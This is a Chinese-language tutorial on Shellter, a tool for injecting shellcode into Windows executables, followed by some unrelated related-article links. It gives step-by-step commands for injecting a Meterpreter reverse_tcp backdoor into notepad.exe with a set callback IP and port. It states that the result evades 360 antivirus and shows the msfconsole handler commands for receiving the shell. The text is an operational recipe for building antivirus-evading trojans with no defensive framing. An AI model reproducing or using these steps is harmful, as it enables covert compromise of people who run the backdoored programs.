先了解一下shellter,原文链接:Shellter | Shellterhttps://www.shellterproject.com/introducing-shellter/

原文:

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).
The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application, and this is just the tip of the iceberg.
Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.

Main Features

  • Compatible with  Windows x86/x64 (XP SP3 and above)  & Wine/CrossOver for Linux/Mac.
  • Portable – No setup is required.
  • Doesn’t require extra dependencies (python, .net, etc…).
  • No static PE templates, framework wrappers etc…
  • Supports any 32-bit payload (generated either by metasploit or custom ones by the user).
  • Compatible with all types of encoding by metasploit.
  • Compatible with custom encoding created by the user.
  • Stealth Mode – Preserves Original Functionality.
  • Multi-Payload PE infection.
  • Proprietary Encoding + User Defined Encoding Sequence.
  • Dynamic Thread Context Keys.
  • Supports Reflective DLL loaders.
  • Embedded Metasploit Payloads.
  • Junk code Polymorphic engine.
  • Thread context aware Polymorphic engine.
  • User can use custom Polymorphic code of his own.
  • Takes advantage of Dynamic Thread Context information for anti-static analysis.
  • Detects self-modifying code.
  • Traces single and multi-thread applications.
  • Fully dynamic injection locations based on the execution flow.
  • Disassembles and shows to the user available injection points.
  • User chooses what to inject, when, and where.
  • Command Line support.
  • Free

译文:

Shellter是一个动态shellcode注入工具,也是有史以来第一个真正的动态PE感染者。
它可用于将 shellcode 注入本机 Windows 应用程序(目前仅限 32 位应用程序)。
shellcode可以是你的,也可以是通过框架(如Metasploit)生成的东西。

Shellter利用了PE文件的原始结构,并且不应用任何修改,例如更改部分中的内存访问权限(除非用户需要),添加具有RWE访问权限的额外部分,以及在AV扫描下看起来狡猾的任何内容。

Shellter使用一种独特的动态方法,该方法基于目标应用程序的执行流,而这只是冰山一角。
Shellter 不仅仅是一个 EPO 感染者,它试图找到一个位置来插入指令以将执行重定向到有效负载。与任何其他感染者不同,Shellter 的高级感染引擎从不将执行流传输到代码洞穴或受感染 PE 文件中的添加部分。

主要特点

  • 兼容 Windows x86/x64 (XP SP3 及更高版本) & Wine/CrossOver for Linux/Mac。
  • 便携式 – 无需设置。
  • 不需要额外的依赖项(python,.net等)。
  • 没有静态PE模板,框架包装器等...
  • 支持任何 32 位有效负载(由 metasploit 生成或由用户自定义生成)。
  • 与所有类型的元编码兼容。
  • 与用户创建的自定义编码兼容。
  • 隐藏模式 – 保留原始功能。
  • 多有效载荷 PE 感染。
  • 专有编码 + 用户定义的编码序列。
  • 动态线程上下文键。
  • 支持反射式 DLL 加载程序。
  • 嵌入式Metasploit Payloads。
  • 垃圾代码多态引擎。
  • 线程上下文感知多态引擎。
  • 用户可以使用自己的自定义多态代码。
  • 利用动态线程上下文信息进行防静电分析。
  • 检测自修改代码。
  • 跟踪单线程和多线程应用程序。
  • 基于执行流的完全动态注入位置。
  • 拆卸并向用户显示可用的注入点。
  • 用户选择要注入的内容、时间和位置。
  • 命令行支持。
  • 自由

Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。shellcode可以是自己写的也可以是使用MSF或者CS生成的。

它有两种模式,自动模式和管理模式(更自由属于高级模式)

目前Shellter的最新版本是v7.2主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话,就需要安装wine环境来运行。shellter目前只能注入32位的可执行文件。

下载地址:Download | Shellterhttps://www.shellterproject.com/download/

接下来开始安装:

apt-get update       //更新

apt-get install shellter    //在线安装

在kali上使用需要安装wine和wine32(可以让linux运行exe),wine是kali自带,使用如下命令安装wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

选择一个exe可执行文件(32位)

其中:

Choose Operation Mode - Auto/Manual (A/M/H):A           //A:自动模式自动注入后门,M:高级模式,H:帮助

PE Target:/home/notepad.exe            // 注入的程序 这里已windows系统自带的32位记事本程序举例

工具安装完成后再/usr/share/windows-resources/shellter  这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。

表示是否启用隐身模式,建议不启用,可以增加免杀效果

Enable Stealth Mode? (Y/N/H): Y               //是否启用隐身模式 Y:启用 N:不启用 H:帮助

Use a listed payload or custom? (L/C/H): L         //使用攻击模块列表或者自定义? 输入L 选择Payload

Select payload by index: 1      //选择第一个

这是设置IP和Port

SET LHOST: 192.168.37.137    //设置反弹回来的IP 本机

SET LPORT:4444         //设置接收反弹的端口

这样我们的木马后门shellcode就注入到这个文件

开启360全部查杀引擎,更新病毒库,查杀,没有任何提示信息。

接下来上线msf,打开msf,进行配置,

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.37.137
set lport 4444
exploit  //监听

这时运行带有后门的notepad.exe文件后,控制端成功连接

kali免杀工具shellter相关推荐

  1. 工具解析:杀毒引擎惨遭打脸,黑帽大会爆惊天免杀工具

    今年的黑帽大会上,可谓是精彩不断.与往届大会对比看来,当属2017这届最有看头.各种推陈出新的技术暂且不论,光是爆出的新免杀工具AVET就足以惊艳全场. 该工具具有极强的病毒逃避功能,可以使原本弱小的 ...

  2. 免杀工具charlotte详解,想要成为白帽子,你不会连这个工具都不会用吧?

    前言 多看看别人的工具,自己也就会写了.(手动狗头) charlotte是一款Python编写的自动化免杀工具,用来生成免杀的dll文件,在antiscan.me上为全绿,效果可见一斑. 官方地址如下 ...

  3. 新鲜的免杀工具 GoBP

    GoBP 最近在收集免杀的项目,以便届时可以应对突发情况,翻到了这么一个项目GoBP外国佬写的 亲测可过 windows defender 卡巴 360 火绒 腾讯电脑管家 使用方法 把payload ...

  4. 远控免杀专题7 ---shellter免杀

    0x01 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...

  5. TideSec远控免杀学习三(Venom+Shellter)

    参考链接: 利用meterpreter下的Venom免杀后门:https://www.cnblogs.com/wh4am1/p/7469625.html 免杀后门venom :https://www. ...

  6. msf rhosts设置文件_聊一聊基于 msf 的免杀项目测试过程

    本文作者:ven0m(信安之路红蓝对抗小组成员) 招新文章:信安之路红蓝对抗小组招募志同道合的朋友 我们在渗透中,需要解决的两个主要问题,一个是过安全检测设备(俗称过 WAF),一个是过杀毒软件(免杀 ...

  7. 远控免杀专题6---Venom免杀

    0x01 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...

  8. 远控免杀5---Veil免杀

    0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...

  9. 远控免杀专题(9)-Avet免杀(VT免杀率14/71)

    本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...

  10. 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

最新文章

  1. istringstream
  2. 连锁商店 状态压缩dp(女赛)
  3. cf1523C. Compression and Expansion
  4. win10乱码了怎么办一招解决windows乱码问题百度经验_TIA Portal博途常见的15大问题汇总...
  5. android 按键点击触摸有水印效果_“100例”—优秀产品设计按键细节设计美图
  6. AutoLISP恢复系统变量到默认值
  7. llinux 查看自己的公网ip
  8. 格兰杰因果检验_R实现
  9. 基于STM32的多普勒雷达测速
  10. 2015CGMC 参赛游戏名单
  11. 初学Play Framework(一)
  12. 机器学习基石笔记(六):泛化理论
  13. java mina性能_高性能Java网络框架 MINA
  14. ubuntu12.04下安装QQ聊天工具
  15. python离线语音转文本_Python实现自动化语音转文本,彻底解放你的双手
  16. Tip | 佳能(EOS 750D) USB无法连接电脑
  17. 重装机兵可以看经验值的计算机,不看后悔 《重装机兵》等级速升攻略
  18. 我的创作纪念日-五周年
  19. 省赛一Ballons dfs
  20. tsd3dmapper软件使用方法_三维图片重建软件 Pix4Dmapper

热门文章

  1. 手把手全面解读思科(Cisco)网络技术学院 考试折扣号申请说明
  2. opencv摄像头速度慢_opencv 摄像头操作详解
  3. Lifo管理系统(转载)
  4. 经济型EtherCAT运动控制器(四):ModbusRTU或ModbusTcp与触摸屏通讯
  5. Hive实现笛卡尔积
  6. linux如何卸载干净mysql
  7. stm32f072--定时器17使用CH1N通道输出pwm时没有波形的原因
  8. 用例图、类图之间的几种关系
  9. 联想 M7600d 激光一体机清零方法
  10. linux统计某种文件大小命令,linux下对符合条件的文件大小做汇总统计的简单命令...